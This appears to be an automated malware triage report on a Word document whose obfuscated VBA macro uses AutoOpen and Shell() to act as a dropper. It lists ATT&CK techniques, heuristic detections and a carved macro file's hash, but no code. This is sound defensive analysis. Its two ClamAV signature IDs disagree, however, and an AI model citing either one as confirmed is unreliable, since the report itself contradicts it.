Verdict: MALICIOUS
Risk Score: 204

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
The sample is a Microsoft Office document containing a VBA macro. The macro includes a Shell() call, indicating an attempt to execute arbitrary code. ClamAV detected the file as 'Doc.Dropper.Agent-6458199-0', suggesting it is a dropper. The VBA script itself is heavily obfuscated, but the Shell() call together with the ClamAV signature strongly suggests that the document's purpose is to download and execute a second-stage payload.
Heuristics (7)

- ClamAV: Doc.Dropper.Agent-6457894-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6457894-0
- VBA macros detected (medium, 2 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of an old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 61585 bytes |

SHA-256: f3a370c8c10680fdd74e36922047fb80202234c5dd9ae674453ac30bf895c4df

Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely. Carved artifact contains 27 long base64-like blob(s).
Preview script: first 1,000 lines of the extracted script (obfuscated VBA source, truncated).